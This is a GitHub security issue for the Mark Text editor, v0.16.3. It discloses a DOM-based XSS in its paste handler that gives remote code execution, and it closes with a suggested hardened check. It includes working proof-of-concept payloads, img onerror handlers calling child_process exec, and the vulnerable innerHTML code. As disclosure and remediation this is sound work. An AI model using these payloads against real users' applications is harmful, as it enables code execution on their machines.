Security issue: DOM based XSS & RCE - from pasting vulnerable HTML #2990

Closed
1 task done
luiseok opened this issue Feb 7, 2022 · 0 comments · Fixed by #3002
luiseok commented Feb 7, 2022

Description

An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS.

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

The above code is inserted into Mark Text's DOM through the source code below, and remote code execution is performed by calling child_process from the inline script.

ContentState.prototype.checkCopyType = function (html, text) {
  let type = 'normal'
  if (!html && text) {
    type = 'copyAsMarkdown'
    const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim())
    if (match && match[1]) {
      const tag = match[1]
      if (tag === 'table' && match.length === 3 && match[2] === 'table') {
        // Try to import a single table
        // The unsanitized clipboard text is parsed here into an element of the
        // live renderer document, so an <img onerror> handler inside it fires.
        const tmp = document.createElement('table')
        tmp.innerHTML = text
        if (tmp.childElementCount === 1) {
          return 'htmlToMd'
        }
      }
      // TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX.
      type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type
    }
  }
  return type
}

  • Can you reproduce the issue?

Steps to reproduce

  1. Copy the vulnerable HTML code
    • <table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
  2. Paste it into Mark Text app

Expected behavior:

HTML should be sanitized before being pasted into the DOM.

Actual behavior:

There is no HTML sanitization step; the code only checks whether the text is wrapped in <table>.

Link to an example: [optional]

bandicam.2022-02-08.01-33-25-900-cut.mp4
bandicam.2022-02-08.01-33-25-900.mp4

Versions

  • MarkText version: v0.16.3
  • Operating system:
    Windows 11 Version 21H2 - OS Build 22000.469
    Kali Linux Kali GNU/Linux Rolling 2021.4
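A hardened version of the check quoted in the report, added here as an example and not Mark Text's own code (the fix in #3002 may differ): clipboard text carrying event-handler attributes, script-like elements or javascript:/data: URLs is refused before any parser sees it, and the single-table probe parses into a DOMParser document, which is inert (no script execution, no image fetch, so no onerror), instead of assigning innerHTML on an element of the live renderer document. PARAGRAPH_TYPES and the 'normal' fallback being the plain-text path are assumptions.

```javascript
// Added example, not Mark Text's code. Hardened checkCopyType: a pre-parse
// gate that rejects active content, then an inert DOMParser probe in place
// of innerHTML on a live-document element.
// PARAGRAPH_TYPES is an assumed stand-in for the editor's own list.
const PARAGRAPH_TYPES = ['p', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'ul', 'ol', 'pre', 'blockquote']
const ACTIVE_ELEMENTS = new Set(['script', 'iframe', 'object', 'embed'])

// Returns a reason string if the markup carries active content, else null.
// It errs on the side of rejecting (data: images are refused too) and is a
// gate in front of inert parsing, not a substitute for a real sanitizer.
function findActiveContent (markup) {
  // A tag body may contain quoted values, and those may contain '>'
  const tagRe = /<\s*([a-zA-Z][\w-]*)((?:"[^"]*"|'[^']*'|[^'">])*)>/g
  let tag
  while ((tag = tagRe.exec(markup)) !== null) {
    const name = tag[1].toLowerCase()
    if (ACTIVE_ELEMENTS.has(name)) return `disallowed element <${name}>`
    const attrRe = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g
    let attr
    while ((attr = attrRe.exec(tag[2])) !== null) {
      const attrName = attr[1].toLowerCase()
      const value = (attr[2] ?? attr[3] ?? attr[4] ?? '').replace(/\s/g, '').toLowerCase()
      if (attrName.startsWith('on')) return `event handler ${attrName} on <${name}>`
      if (/^(javascript|vbscript|data):/.test(value)) return `${attrName} with ${value.split(':')[0]}: URL on <${name}>`
    }
  }
  return null
}

function checkCopyType (html, text) {
  let type = 'normal'
  if (!html && text) {
    type = 'copyAsMarkdown'
    const trimmed = text.trim()
    const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(trimmed)
    if (match && match[1]) {
      // Anything active falls back to 'normal' (assumed to be the plain-text path)
      if (findActiveContent(trimmed) !== null) return 'normal'
      const tag = match[1]
      if (tag === 'table' && match[2] === 'table') {
        // Inert document: scripts do not run and images are not fetched
        const doc = new DOMParser().parseFromString(trimmed, 'text/html')
        if (doc.body.childElementCount === 1 && doc.body.firstElementChild.tagName === 'TABLE') return 'htmlToMd'
      }
      type = PARAGRAPH_TYPES.includes(tag) ? 'copyAsHtml' : type
    }
  }
  return type
}
```

Converting the inert document to Markdown and rendering the result still has to go through the editor's sanitizer; the gate only keeps the probe itself from executing anything.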